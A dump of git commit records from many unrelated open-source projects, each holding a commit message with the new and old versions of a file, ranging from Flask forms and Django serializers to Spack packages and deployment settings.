max_results=fetch_count,
page_token=page_token)
log.info('\t\tfetched %d rows %s' % (len(rows), (' for ' + project_name) if project_name else ''))
return total_rows, rows, page_token
| '''
Created on Jan 22, 2017
Copyright 2017, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from google.cloud import bigquery
def query_bq_table(query, use_legacy, project, log):
log.info('\t\tquerying bq: %s' % query)
client = bigquery.Client(project=project)
query_results = client.run_sync_query(query)
# Use standard SQL syntax for queries.
# See: https://cloud.google.com/bigquery/sql-reference/
query_results.use_legacy_sql = use_legacy
query_results.run()
log.info('\t\tdone querying bq: %s' % query)
return query_results
def fetch_paged_results(query_results, fetch_count, project_name, page_token, log):
log.info('\t\trequesting %d rows %s' % (fetch_count, (' for ' + project_name) if project_name else ''))
rows, total_rows, page_token = query_results.fetch_data(
max_results=fetch_count,
page_token=page_token)
log.info('\t\tfetched %d rows %s' % (len(rows), (' for ' + project_name) if project_name else ''))
return total_rows, rows, page_token
| apache-2.0 | Python |
d590307b0d59ac7163016197e3de0e8bced377d2 | Fix form typo | TwilioDevEd/account-verification-flask,TwilioDevEd/account-verification-flask,TwilioDevEd/account-verification-flask | account_verification_flask/forms/forms.py | account_verification_flask/forms/forms.py | from flask_wtf import Form
from wtforms import TextField, PasswordField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo
class RegisterForm(Form):
name = TextField(
'Tell us your name',
validators = [DataRequired(message = "Name is required"), Length(min = 3,message = "Name must greater than 3 chars")]
)
email = TextField(
'Enter your E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
password = PasswordField(
'Password',
validators = [DataRequired("Password is required")]
)
country_code = TextField(
'Country Code',
validators = [DataRequired("Country code is required"), Length(min = 1, max = 4, message = "Country must be between 1 and 4 chars")]
)
phone_number = IntegerField(
'Phone Number',
validators = [DataRequired("Valid phone number is required")]
)
class ResendCodeForm(Form):
email = TextField(
'E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
class VerifyCodeForm(ResendCodeForm):
verification_code = TextField(
'Verification Code',
validators = [DataRequired("Verification code is required")]
)
| from flask_wtf import Form
from wtforms import TextField, PasswordField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo
class RegisterForm(Form):
name = TextField(
'Tell us your name',
validators = [DataRequired(message = "Name is required"), Length(min = 3,message = "Name must greater than 3 chars")]
)
email = TextField(
'Enter your E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
password = PasswordField(
'Password',
validators = [DataRequired("Password is required")]
)
country_code = TextField(
'Coundtry Code',
validators = [DataRequired("Country code is required"), Length(min = 1, max = 4, message = "Country must be between 1 and 4 chars")]
)
phone_number = IntegerField(
'Phone Number',
validators = [DataRequired("Valid phone number is required")]
)
class ResendCodeForm(Form):
email = TextField(
'E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
class VerifyCodeForm(ResendCodeForm):
verification_code = TextField(
'Verification Code',
validators = [DataRequired("Verification code is required")]
)
| mit | Python |
7998477a627a78b83f96894e72ec2f121c4b9606 | Update binding.gyp | jeremycx/node-LDAP,jeremycx/node-LDAP,jeremycx/node-LDAP,jeremycx/node-LDAP | binding.gyp | binding.gyp | {
"targets": [
{
'target_name': 'LDAP',
'sources': [
'src/LDAP.cc'
],
'include_dirs': [
'/usr/local/include'
],
'defines': [
'LDAP_DEPRECATED'
],
'cflags': [
'-Wall',
'-g'
],
'libraries': [
'-llber -lldap'
],
'ldflags': [
'-L/usr/local/lib'
],
'conditions': [
['OS=="linux"', {
'ldflags': [
'-luuid'
]
}
],
['OS=="mac"', {
"link_settings": {
"libraries": [
"-lldap"
]
}
}
]
]
}
]
}
| {
"targets": [
{
'target_name': 'LDAP',
'sources': [
'src/LDAP.cc'
],
'include_dirs': [
'/usr/local/include'
],
'defines': [
'LDAP_DEPRECATED'
],
'cflags': [
'-Wall',
'-g'
],
'ldflags': [
'-L/usr/local/lib',
'-lldap'
],
'conditions': [
['OS=="linux"', {
'ldflags': [
'-luuid'
]
}
],
['OS=="mac"', {
"link_settings": {
"libraries": [
"-lldap"
]
}
}
]
]
}
]
}
| mit | Python |
2a65b1715e469e11ed73faf7f3446f81c836c42e | Add fetch domain logic | kkstu/DNStack,kkstu/DNStack,kkstu/DNStack | handler/domain.py | handler/domain.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
# Domain Page
from BaseHandler import BaseHandler
from tornado.web import authenticated as Auth
from model.models import Domain, Groups, Record
class IndexHandler(BaseHandler):
@Auth
def get(self):
page = int(self.get_argument('page', 1))
line = int(self.get_argument('line', 20))
offset = (page - 1) * line
data = self.db.query(Domain).offset(offset).limit(line).all()
self.render('domain/index.html',data=data)
class GroupHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/group.html')
class RecordHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/record.html')
| #!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
# Domain Page
from BaseHandler import BaseHandler
from tornado.web import authenticated as Auth
class IndexHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/index.html')
class GroupHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/group.html')
class RecordHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/record.html')
| mit | Python |
c7412824c1e9edb7c386f111ce30b5d76952f861 | Remove 'reviews' from Context API return | Architizer/mendel,Architizer/mendel,Architizer/mendel,Architizer/mendel | mendel/serializers.py | mendel/serializers.py | from .models import Keyword, Category, Document, Context, Review, User
from rest_auth.models import TokenModel
from rest_framework import serializers
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
fields = ('id', 'name', 'definition')
def create(self, validated_data):
instance, _ = Keyword.objects.get_or_create(**validated_data)
return instance
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ('id', 'name', 'description')
class ContextSerializer(serializers.ModelSerializer):
keyword_given = KeywordSerializer()
user_reviews = serializers.SerializerMethodField('get_reviews')
def get_reviews(self, obj):
results = Review.objects.filter(user=self.context['request'].user)
return ReviewSerializer(results, many=True).data
class Meta:
model = Context
fields = ('id', 'position_from', 'position_to', 'text', 'document', 'keyword_given', 'next_context_id', 'prev_context_id', 'user_reviews')
depth = 1
class DocumentSerializer(serializers.ModelSerializer):
class Meta:
model = Document
fields = ('__all__')
class ReviewSerializer(serializers.ModelSerializer):
class Meta:
model = Review
fields = ('__all__')
class UserSerializer(serializers.ModelSerializer):
last_context_id = serializers.SerializerMethodField('return_last_context_id')
def return_last_context_id(self, user):
try:
return Review.objects.filter(user=user.id).latest('created').context.id
except:
return Context.objects.first().id if Context.objects.first() else None
class Meta:
model = User
fields = ('id', 'username', 'is_staff', 'last_context_id')
class TokenSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = TokenModel
fields = ('key','user',)
depth = 1
| from .models import Keyword, Category, Document, Context, Review, User
from rest_auth.models import TokenModel
from rest_framework import serializers
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
fields = ('id', 'name', 'definition')
def create(self, validated_data):
instance, _ = Keyword.objects.get_or_create(**validated_data)
return instance
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ('id', 'name', 'description')
class ContextSerializer(serializers.ModelSerializer):
keyword_given = KeywordSerializer()
user_reviews = serializers.SerializerMethodField('get_reviews')
def get_reviews(self, obj):
results = Review.objects.filter(user=self.context['request'].user)
return ReviewSerializer(results, many=True).data
class Meta:
model = Context
fields = ('id', 'position_from', 'position_to', 'text', 'document', 'keyword_given', 'next_context_id', 'prev_context_id', 'reviews', 'user_reviews')
depth = 1
class DocumentSerializer(serializers.ModelSerializer):
class Meta:
model = Document
fields = ('__all__')
class ReviewSerializer(serializers.ModelSerializer):
class Meta:
model = Review
fields = ('__all__')
class UserSerializer(serializers.ModelSerializer):
last_context_id = serializers.SerializerMethodField('return_last_context_id')
def return_last_context_id(self, user):
try:
return Review.objects.filter(user=user.id).latest('created').context.id
except:
return Context.objects.first().id if Context.objects.first() else None
class Meta:
model = User
fields = ('id', 'username', 'is_staff', 'last_context_id')
class TokenSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = TokenModel
fields = ('key','user',)
depth = 1
| agpl-3.0 | Python |
f471441bde9940e46badd0ec506c18e8587de004 | Optimize the rebuild admin | SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci | metaci/build/admin.py | metaci/build/admin.py | from django.contrib import admin
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import FlowTask
from metaci.build.models import Rebuild
class BuildAdmin(admin.ModelAdmin):
list_display = (
'repo',
'plan',
'branch',
'commit',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('repo', 'plan')
list_select_related = ('branch','repo','plan')
raw_id_fields = ('branch', 'plan', 'repo', 'org', 'org_instance', 'current_rebuild')
admin.site.register(Build, BuildAdmin)
class BuildFlowAdmin(admin.ModelAdmin):
list_display = (
'build',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(BuildFlow, BuildFlowAdmin)
class FlowTaskAdmin(admin.ModelAdmin):
list_display = ('id', 'build_flow', 'stepnum', 'path', 'status')
list_filter = ('build_flow__build__repo',)
raw_id_fields = ['build_flow']
admin.site.register(FlowTask, FlowTaskAdmin)
class RebuildAdmin(admin.ModelAdmin):
list_display = (
'build',
'user',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build__plan')
raw_id_fields = ('build', 'org_instance')
admin.site.register(Rebuild, RebuildAdmin)
| from django.contrib import admin
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import FlowTask
from metaci.build.models import Rebuild
class BuildAdmin(admin.ModelAdmin):
list_display = (
'repo',
'plan',
'branch',
'commit',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('repo', 'plan')
list_select_related = ('branch','repo','plan')
raw_id_fields = ('branch', 'plan', 'repo', 'org', 'org_instance', 'current_rebuild')
admin.site.register(Build, BuildAdmin)
class BuildFlowAdmin(admin.ModelAdmin):
list_display = (
'build',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(BuildFlow, BuildFlowAdmin)
class FlowTaskAdmin(admin.ModelAdmin):
list_display = ('id', 'build_flow', 'stepnum', 'path', 'status')
list_filter = ('build_flow__build__repo',)
raw_id_fields = ['build_flow']
admin.site.register(FlowTask, FlowTaskAdmin)
class RebuildAdmin(admin.ModelAdmin):
list_display = (
'build',
'user',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(Rebuild, RebuildAdmin)
| bsd-3-clause | Python |
206f76026504219ed52f2fcca1b6b64b78bdcf21 | Add some print statements | SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper | software/lightpowertool/csv_export.py | software/lightpowertool/csv_export.py | import csv
class CSVExport(object):
"""docstring for CSVExport"""
def __init__(self, filename):
super(CSVExport, self).__init__()
self._filename = filename
def export_data(self, data):
print("Beginning exportation of data...")
with open(self._filename, "w", newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
for single_data in data:
csvwriter.writerow(list(single_data))
print("Exportation has been done!")
| import csv
class CSVExport(object):
"""docstring for CSVExport"""
def __init__(self, filename):
super(CSVExport, self).__init__()
self._filename = filename
def export_data(self, data):
with open(self._filename, "w", newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
for single_data in data:
csvwriter.writerow(list(single_data))
| agpl-3.0 | Python |
3121a02c6174a31b64974d57a3ec2d7df760a7ae | Ajoute une référence législative au taux d'incapacité | sgmap/openfisca-france,sgmap/openfisca-france | openfisca_france/model/caracteristiques_socio_demographiques/capacite_travail.py | openfisca_france/model/caracteristiques_socio_demographiques/capacite_travail.py | # -*- coding: utf-8 -*-
from openfisca_france.model.base import *
class taux_capacite_travail(Variable):
value_type = float
default_value = 1.0
entity = Individu
label = u"Taux de capacité de travail, appréciée par la commission des droits et de l'autonomie des personnes handicapées (CDAPH)"
definition_period = MONTH
class taux_incapacite(Variable):
value_type = float
entity = Individu
label = u"Taux d'incapacité"
definition_period = MONTH
reference = "https://www.legifrance.gouv.fr/affichCodeArticle.do;jsessionid=BD54F4B28313142C87FC8B96013E0441.tplgfr44s_1?idArticle=LEGIARTI000023097719&cidTexte=LEGITEXT000006073189&dateTexte=20190312"
documentation = "Taux d'incapacité retenu pour l'Allocation Adulte Handicapé (AAH)."
| # -*- coding: utf-8 -*-
from openfisca_france.model.base import *
class taux_capacite_travail(Variable):
value_type = float
default_value = 1.0
entity = Individu
label = u"Taux de capacité de travail, appréciée par la commission des droits et de l'autonomie des personnes handicapées (CDAPH)"
definition_period = MONTH
class taux_incapacite(Variable):
value_type = float
entity = Individu
label = u"Taux d'incapacité"
definition_period = MONTH
| agpl-3.0 | Python |
a279cb4340c6da5ed64b39660cfcb5ef53d0bb74 | Fix test | cjellick/rancher,rancher/rancher,rancher/rancher,cjellick/rancher,rancherio/rancher,rancher/rancher,rancherio/rancher,cjellick/rancher,rancher/rancher | tests/core/test_node.py | tests/core/test_node.py | from common import auth_check
def test_node_fields(mc):
cclient = mc.client
fields = {
'nodeTaints': 'r',
'nodeLabels': 'r',
'nodeAnnotations': 'r',
'namespaceId': 'cr',
'conditions': 'r',
'allocatable': 'r',
'capacity': 'r',
'hostname': 'r',
'info': 'r',
'ipAddress': 'r',
'limits': 'r',
'nodePoolUuid': 'r',
'nodeName': 'r',
'requested': 'r',
'clusterId': 'cr',
'etcd': 'cr',
'controlPlane': 'cr',
'worker': 'cr',
'requestedHostname': 'cr',
'volumesAttached': 'r',
'nodeTemplateId': 'cr',
'volumesInUse': 'r',
'podCidr': 'r',
'name': 'cru',
'taints': 'ru',
'unschedulable': 'ru',
'providerId': 'r',
'sshUser': 'r',
'imported': "cru",
}
for name, field in cclient.schema.types['node'].resourceFields.items():
if name.endswith("Config"):
fields[name] = 'cr'
fields['customConfig'] = 'cru'
auth_check(cclient.schema, 'node', 'crud', fields)
| from common import auth_check
def test_node_fields(mc):
cclient = mc.client
fields = {
'nodeTaints': 'r',
'nodeLabels': 'r',
'nodeAnnotations': 'r',
'namespaceId': 'cr',
'conditions': 'r',
'allocatable': 'r',
'capacity': 'r',
'hostname': 'r',
'info': 'r',
'ipAddress': 'r',
'limits': 'r',
'nodePoolUuid': 'r',
'nodeName': 'r',
'requested': 'r',
'clusterId': 'cr',
'etcd': 'cru',
'controlPlane': 'cru',
'worker': 'cru',
'requestedHostname': 'cr',
'volumesAttached': 'r',
'nodeTemplateId': 'cr',
'volumesInUse': 'r',
'podCidr': 'r',
'name': 'cru',
'taints': 'ru',
'unschedulable': 'ru',
'providerId': 'r',
'sshUser': 'r',
'imported': "cru",
}
for name, field in cclient.schema.types['node'].resourceFields.items():
if name.endswith("Config"):
fields[name] = 'cr'
fields['customConfig'] = 'cru'
auth_check(cclient.schema, 'node', 'crud', fields)
| apache-2.0 | Python |
1bf3e893e45e0dc16e2e820f5f073a63600217c3 | Fix errors in PeriodicFilter | Twinters007/robotpy-wpilib-utilities,robotpy/robotpy-wpilib-utilities,Twinters007/robotpy-wpilib-utilities,robotpy/robotpy-wpilib-utilities | robotpy_ext/misc/periodic_filter.py | robotpy_ext/misc/periodic_filter.py | import logging
import time
class PeriodicFilter:
"""
Periodic Filter to help keep down clutter in the console.
Simply add this filter to your logger and the logger will
only print periodically.
The logger will always print logging levels of WARNING or higher
"""
def __init__(self, period, bypassLevel=logging.WARN):
'''
:param period: Wait period (in seconds) between logs
:param bypassLevel: Lowest logging level that the filter should ignore
'''
self._period = period
self._loggingLoop = True
self._last_log = -period
self._bypassLevel = bypassLevel
def filter(self, record):
"""Performs filtering action for logger"""
self._refresh_logger()
return self._loggingLoop or record.levelno >= self._bypassLevel
def _refresh_logger(self):
"""Determine if the log wait period has passed"""
now = time.monotonic()
self._loggingLoop = False
if now - self._last_log > self._period:
self._loggingLoop = True
self._last_log = now
| import logging
import wpilib
class PeriodicFilter:
"""
Periodic Filter to help keep down clutter in the console.
Simply add this filter to your logger and the logger will
only print periodically.
The logger will always print logging levels of WARNING or higher
"""
def __init__(self, period, bypassLevel=logging.WARN):
'''
:param period: Wait period (in seconds) between logs
:param bypassLevel: Lowest logging level that the filter should ignore
'''
self.period = period
self.loggingLoop = True
self._last_log = -period
self.bypassLevel = bypassLevel
def filter(self, record):
"""Performs filtering action for logger"""
self._refresh_logger()
return self.parent.loggingLoop or record.levelno >= self.bypassLevel
def _refresh_logger(self):
"""Determine if the log wait period has passed"""
now = wpilib.Timer.getFPGATimestamp()
self.loggingLoop = False
if now - self.__last_log > self.logging_interval:
self.loggingLoop = True
self.__last_log = now
| bsd-3-clause | Python |
881b5c56e89fb2fdb7d4af3a9ec5c5044a25b878 | declare dummy functions | gautamdivgi/eris,LCOO/eris | ansible/lib/modules/rally/library/test.py | ansible/lib/modules/rally/library/test.py | from ansible.module_utils.basic import *
DOCUMENTATION = '''
---
module: rally
short_description: Executes rally commands
'''
def main():
fields = {
"scenario_file" : {"required": True, "type": "str"},
"scenario_args" : {"required" : False, "type": "str"},
}
commands = {'create_db', 'create_deployment', 'check_deployment', 'start_task' , 'task_report' }
module = AnsibleModule(argument_spec={})
response = {"hello": "world"}
module.exit_json(changed=False, meta=response)
def create_db:
pass
def create_deployment:
pass
def check_deployment:
pass
def start_task:
pass
def task_report:
pass
if __name__ == '__main__':
# CALL Rally loader
# TODO
main()
| from ansible.module_utils.basic import *
DOCUMENTATION = '''
---
module: rally
short_description: Executes rally commands
'''
def main():
fields = {
"scenario_file" : {"required": True, "type": "str"},
"scenario_args" : {"required" : False, "type": "str"},
}
commands = {'create_db', 'create_deployment', 'check_deployment', 'start_task' }
module = AnsibleModule(argument_spec={})
response = {"hello": "world"}
module.exit_json(changed=False, meta=response)
if __name__ == '__main__':
main()
| apache-2.0 | Python |
27330e69226f36b49f5d5eca5a67af29ee8d679b | Normalize the weasyl link. | Weasyl/conbadger | conbadge.py | conbadge.py | from fractions import Fraction
from cStringIO import StringIO
from PIL import Image, ImageDraw, ImageFont
import qrcode
import requests
museo = ImageFont.truetype('Museo500-Regular.otf', 424)
badge_back = Image.open('badge-back.png')
logo_stamp = Image.open('logo-stamp.png')
qr_size = 975, 975
qr_offset = 75, 75
name_color = 6, 155, 192
text_bounds = 735, 125
text_offset = 365, 1155
avatar_bounds = 282, 282
avatar_offset = 49, 1131
class AvatarFetchError(Exception):
pass
def draw_text(text, color, fit_size):
text_size = museo.getsize(text)
img = Image.new('RGBA', text_size, color + (0,))
draw = ImageDraw.Draw(img)
draw.text((0, 0), text, color + (255,), font=museo)
width, height = img.size
fit_width, fit_height = fit_size
width_ratio = Fraction(width, fit_width)
height_ratio = Fraction(height, fit_height)
if width_ratio > height_ratio:
new_size = fit_width, int(height / width_ratio)
else:
new_size = int(width / height_ratio), fit_height
return img.resize(new_size, Image.ANTIALIAS)
def center(size, fit_size, offset):
w, h = size
fw, fh = fit_size
x, y = offset
return x + (fw - w) // 2, y + (fh - h) // 2
logo_pos = center(logo_stamp.size, qr_size, qr_offset)
def weasyl_sysname(target):
return ''.join(i for i in target if i.isalnum()).lower()
def weasyl_badge(username, avatar_resizing=Image.ANTIALIAS):
r = requests.get(
'https://www.weasyl.com/api/useravatar', params={'username': username})
resp = r.json()
if resp['error']['code'] != 0:
raise AvatarFetchError(resp['error'])
back = badge_back.copy()
qr = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H, border=1)
qr.add_data('https://weasyl.com/~%s' % (weasyl_sysname(username),))
qr_mask = qr.make_image().resize(qr_size)
back.paste((255, 255, 255, 255), qr_offset, qr_mask)
back.paste(logo_stamp, logo_pos, logo_stamp)
text = draw_text(username, name_color, text_bounds)
text_pos = center(text.size, text_bounds, text_offset)
back.paste(text, text_pos, text)
avatar = Image.open(StringIO(requests.get(resp['avatar']).content))
avatar = avatar.resize(avatar_bounds, avatar_resizing).convert('RGBA')
back.paste(avatar, avatar_offset, avatar)
return back
| from fractions import Fraction
from cStringIO import StringIO
from PIL import Image, ImageDraw, ImageFont
import qrcode
import requests
museo = ImageFont.truetype('Museo500-Regular.otf', 424)
badge_back = Image.open('badge-back.png')
logo_stamp = Image.open('logo-stamp.png')
qr_size = 975, 975
qr_offset = 75, 75
name_color = 6, 155, 192
text_bounds = 735, 125
text_offset = 365, 1155
avatar_bounds = 282, 282
avatar_offset = 49, 1131
class AvatarFetchError(Exception):
pass
def draw_text(text, color, fit_size):
text_size = museo.getsize(text)
img = Image.new('RGBA', text_size, color + (0,))
draw = ImageDraw.Draw(img)
draw.text((0, 0), text, color + (255,), font=museo)
width, height = img.size
fit_width, fit_height = fit_size
width_ratio = Fraction(width, fit_width)
height_ratio = Fraction(height, fit_height)
if width_ratio > height_ratio:
new_size = fit_width, int(height / width_ratio)
else:
new_size = int(width / height_ratio), fit_height
return img.resize(new_size, Image.ANTIALIAS)
def center(size, fit_size, offset):
w, h = size
fw, fh = fit_size
x, y = offset
return x + (fw - w) // 2, y + (fh - h) // 2
logo_pos = center(logo_stamp.size, qr_size, qr_offset)
def weasyl_badge(username, avatar_resizing=Image.ANTIALIAS):
r = requests.get(
'https://www.weasyl.com/api/useravatar', params={'username': username})
resp = r.json()
if resp['error']['code'] != 0:
raise AvatarFetchError(resp['error'])
back = badge_back.copy()
qr = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H, border=1)
qr.add_data('https://weasyl.com/~%s' % (username,))
qr_mask = qr.make_image().resize(qr_size)
back.paste((255, 255, 255, 255), qr_offset, qr_mask)
back.paste(logo_stamp, logo_pos, logo_stamp)
text = draw_text(username, name_color, text_bounds)
text_pos = center(text.size, text_bounds, text_offset)
back.paste(text, text_pos, text)
avatar = Image.open(StringIO(requests.get(resp['avatar']).content))
avatar = avatar.resize(avatar_bounds, avatar_resizing).convert('RGBA')
back.paste(avatar, avatar_offset, avatar)
return back
| isc | Python |
90678692ec85ec90d454b1a3b255dae834bb24ba | trim space | klen/peewee_migrate | tests/mocks/postgres.py | tests/mocks/postgres.py | from psycopg2.extensions import connection, cursor
class MockConnection(connection):
def __init__(self, *args, **kwargs):
self._cursor = MockCursor()
def cursor(self, *args, **kwargs):
return self._cursor
class MockCursor(cursor):
def __init__(self, *args, **kwargs):
self.queries = []
def execute(self, query, *args, **kwargs):
self.queries.append(query)
def fetchall(self, *args, **kwargs):
return []
def fetchone(self, *args, **kwargs):
return None
__all__ = ["MockConnection"] |
from psycopg2.extensions import connection, cursor
class MockConnection(connection):
def __init__(self, *args, **kwargs):
self._cursor = MockCursor()
def cursor(self, *args, **kwargs):
return self._cursor
class MockCursor(cursor):
def __init__(self, *args, **kwargs):
self.queries = []
def execute(self, query, *args, **kwargs):
self.queries.append(query)
def fetchall(self, *args, **kwargs):
return []
def fetchone(self, *args, **kwargs):
return None
__all__ = ["MockConnection"] | bsd-3-clause | Python |
4c5ebbabcf54b1f23459da7ddf85adf5e5de22d8 | Update add-lore.py to serve legacy lorebot needs | christhompson/loredb | add-lore.py | add-lore.py | #!/usr/bin/env python3
import argparse
import datetime
from peewee import peewee
db = peewee.SqliteDatabase(None)
class BaseModel(peewee.Model):
class Meta:
database = db
class Lore(BaseModel):
time = peewee.DateTimeField(null=True, index=True)
author = peewee.CharField(null=True, index=True)
lore = peewee.CharField()
rating = peewee.FloatField()
def __str__(self):
return "[%s] [%s]\n%s" % (self.time, self.author, self.lore)
def main():
lore_file = 'lore.db'
db.init(lore_file)
parser = argparse.ArgumentParser()
parser.add_argument('lore', nargs='+', help="blob of lore to save")
args = parser.parse_args()
lore = ' '.join(args.lore)
# add-lore "[mike_bloomfield]: how do i use the lorebot "
t = datetime.datetime.now()
# Try to parse plain loreblob, extracting author from []
author = lore.split(': ')[0].split('[')[1].split(']')[0]
loretxt = ': '.join(lore.split(': ')[1:])
db.begin()
# Check to see if lore already exists (based on author/lore match)
matches = Lore.select().where(Lore.author == author and Lore.lore == lore).count()
if matches == 0:
l = Lore.create(time=t, author=author, lore=loretxt, rating=0)
print(l)
else:
print("Lore already exists...")
db.commit()
if __name__ == "__main__":
main()
| #!/usr/bin/env python3
import argparse
import datetime
from peewee import peewee
db = peewee.SqliteDatabase(None)
class BaseModel(peewee.Model):
class Meta:
database = db
class Lore(BaseModel):
time = peewee.DateTimeField(null=True, index=True)
author = peewee.CharField(null=True, index=True)
lore = peewee.CharField()
rating = peewee.FloatField()
def main():
lore_file = 'lore.db'
db.init(lore_file)
parser = argparse.ArgumentParser()
parser.add_argument('author')
parser.add_argument('lore', nargs='+', help="blob of lore to save")
args = parser.parse_args()
print(args.lore)
t = datetime.datetime.now()
# Try to parse plain loreblob, extracting author from []
author = args.author
lore = ' '.join(args.lore)
print(author, lore)
db.begin()
# Check to see if lore already exists (based on author/lore match)
matches = Lore.select().where(Lore.author == author and Lore.lore == lore).count()
if matches == 0:
Lore.create(time=t, author=author, lore=lore, rating=0)
db.commit()
if __name__ == "__main__":
main()
| apache-2.0 | Python |
6ed282bb2da04790e6e399faad4d2ba8dfc214c4 | add v0.20210330 (#28111) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/ccls/package.py | var/spack/repos/builtin/packages/ccls/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Ccls(CMakePackage):
"""C/C++ language server"""
homepage = "https://github.com/MaskRay/ccls"
git = "https://github.com/MaskRay/ccls.git"
url = "https://github.com/MaskRay/ccls/archive/0.20201025.tar.gz"
maintainers = ['jacobmerson']
version('0.20210330', sha256='28c228f49dfc0f23cb5d581b7de35792648f32c39f4ca35f68ff8c9cb5ce56c2')
version('0.20201025', sha256='1470797b2c1a466e2d8a069efd807aac6fefdef8a556e1edf2d44f370c949221')
variant('build_type', default='Release', description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on("[email protected]:", type="build")
depends_on('llvm@7:')
depends_on('rapidjson')
| # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Ccls(CMakePackage):
"""C/C++ language server"""
homepage = "https://github.com/MaskRay/ccls"
git = "https://github.com/MaskRay/ccls.git"
url = "https://github.com/MaskRay/ccls/archive/0.20201025.tar.gz"
maintainers = ['jacobmerson']
version('0.20201025', sha256='1470797b2c1a466e2d8a069efd807aac6fefdef8a556e1edf2d44f370c949221')
variant('build_type', default='Release', description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on("[email protected]:", type="build")
depends_on('llvm@7:')
depends_on('rapidjson')
| lgpl-2.1 | Python |
f230e69780823f4ceb48a68015cd5bd4af94cba0 | Add in some settings for email | pombredanne/discern,pombredanne/discern,pombredanne/discern,pombredanne/discern | ml_service_api/aws.py | ml_service_api/aws.py | """
Deployment settings file
"""
from settings import *
import json
DEBUG=False
TIME_BETWEEN_INDEX_REBUILDS = 60 * 30 # seconds
#Tastypie throttle settings
THROTTLE_AT = 100 #Throttle requests after this number in below timeframe
THROTTLE_TIMEFRAME= 60 * 60 #Timeframe in which to throttle N requests, seconds
THROTTLE_EXPIRATION= 24 * 60 * 60 # When to remove throttle entries from cache, seconds
with open(os.path.join(ENV_ROOT,"env.json")) as env_file:
ENV_TOKENS = json.load(env_file)
with open(os.path.join(ENV_ROOT, "auth.json")) as auth_file:
AUTH_TOKENS = json.load(auth_file)
DATABASES = AUTH_TOKENS.get('DATABASES', DATABASES)
CACHES = AUTH_TOKENS.get('CACHES', CACHES)
AWS_ACCESS_KEY_ID = AUTH_TOKENS.get('AWS_ACCESS_KEY_ID', AWS_ACCESS_KEY_ID)
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS.get('AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)
USE_S3_TO_STORE_MODELS = ENV_TOKENS.get('USE_S3_TO_STORE_MODELS', USE_S3_TO_STORE_MODELS)
S3_BUCKETNAME = ENV_TOKENS.get('S3_BUCKETNAME', S3_BUCKETNAME)
BROKER_URL = AUTH_TOKENS.get('BROKER_URL', BROKER_URL)
CELERY_RESULT_BACKEND = AUTH_TOKENS.get('CELERY_RESULT_BACKEND', CELERY_RESULT_BACKEND)
ELB_HOSTNAME = ENV_TOKENS.get('ELB_HOSTNAME', None)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
AWS_SES_REGION_NAME = ENV_TOKENS.get('AWS_SES_REGION_NAME', None)
if AWS_SES_REGION_NAME is not None:
AWS_SES_REGION_ENDPOINT = 'email.{0}.amazonaws.com'.format(AWS_SES_REGION_NAME)
if ELB_HOSTNAME is not None:
ALLOWED_HOSTS += [ELB_HOSTNAME] | """
Deployment settings file
"""
from settings import *
import json
DEBUG=False
